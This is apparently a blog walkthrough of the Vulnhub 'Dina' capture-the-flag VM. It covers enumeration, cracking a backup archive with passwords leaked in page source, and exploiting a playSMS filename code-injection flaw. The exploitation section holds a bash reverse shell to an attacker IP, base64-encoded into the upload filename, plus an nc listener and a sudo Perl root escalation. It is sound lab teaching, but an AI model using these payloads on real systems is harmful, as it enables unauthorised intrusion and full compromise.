This post is a walkthrough for Dina 1.0.1 on Vulnhub.
Dina uses DHCP so you’ll have to figure out what the IP is. Using netdiscover -r IPRANGE will help you with that.
First thing to do is to run a nmap scan … nmap -sC -sV -v IPADDRESS -oN OUTPUTFILE
There’s not much to go off of except a webpage. It does list the directories from the robots.txt file. Let’s go to the webpage and see what’s there.
Not much here even when looking at the source. Let’s try some of the robot.txt directories.
This is not a normal error message. Let’s look at the source.
Ok so this is interesting. Somebody thought it was a great idea to put a bunch of passwords in the source of the webpage. This is a very simple example of security by obscurity and it doesn’t work. Unfortunately, we don’t have anything to try the passwords on. The other robot.txt directories didn’t turn up anything. Let’s do some more enumeration.
Running nikto on the site (nikto -h IPADDRESS) gives us some more directories to look at. One of them is called secure … that might be interesting.
Inside the secure directory is a file called backup.zip. I couldn’t unzip it with native Kali tools, so I put it in Windows and used 7zip. It prompts for a password. Luckily, we have a few to try.
The first password in the list (freedom) worked and I was able to extract the mp3 file. Sometimes in CTFs, they put challenges into audio files. I was all prepared with my audio editor except the file wouldn’t load. It wasn’t an mp3.
Running file against the mp3 revealed that it was just a text file.
I renamed the file to a text file and took a look at it.
This gives us a user name and a new url with a login. Let’s check it out!
On the page is something called playSMS. Using the user name touhid and running through the password list from earlier, I was able to login with the password diana.
At this point, I looked for places to upload files or code. There was one place that allowed a file upload, but the file itself never really wrote to the system. I went to Google and searched for playSMS exploits and I found one in exploitDB. There are also two Metasploit modules that work on this VM. The manual way is more interesting though, so I’m going to show that method. If you can’t get it to work, go the Metasploit route.
The key here is the filename. After the upload, the system will display the filename. If the filename contains php code, the code will execute. In the example they are running the system command uname -a. Let’s try it and see what happens.
Now we have code execution! The only problem is that slashes / are not allowed in files names. That makes it really hard to get a reverse shell. They system does have netcat, but it’s not a version with the gaping security hole (-e flag). The solution is to encode the command string and get the system to run it on the other side.
First, let’s find a reverse shell to use. I used this from pentestmonkey: bash -i >& /dev/tcp/192.168.2.30/7777 0>&1
Now echo that into base64: echo “bash -i >& /dev/tcp/192.168.2.30/7777 0>&1” | base64
This gave me YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMzAvNzc3NyAwPiYxCg== as the encoded string. Yours will be different based on the IP address and port number.
So now we have an encoded string that should give us a reverse shell. Now we need to set up the filename to decode and run it on the other end.
Inside the single quotes where we had uname -a, we’re going to replace that with: echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMzAvNzc3NyAwPiYxCg== | base64 -d | bash
What we’re doing is echoing the string, piping it into base64 (decoding it with the -d flag), and finally piping the string to bash for execution.
Now we need to get our listener setup: nc -nlvp 7777
Once the file is uploaded, we get a shell!
The first thing I do after this is spawn a better shell: python -c ‘import pty; pty.spawn(“/bin/sh”)’
Now I can do things like sudo. Let’s check our sudo permissions with sudo -l.
This is awesome! We can run Perl commands as root. Googling for reverse shells, I easily found this one using Perl: perl -e ‘exec “/bin/bash”;’
The only change is that we’ll have to use the full path to Perl for this to work.
Navigating to the root directory and viewing the root flag is now possible.
That’s the box. It was definitely beginner level especially if using Metasploit. Hopefully you found it helpful.
If you want to see a video walkthrough where I also show the Metasploit path, you can view it here on YouTube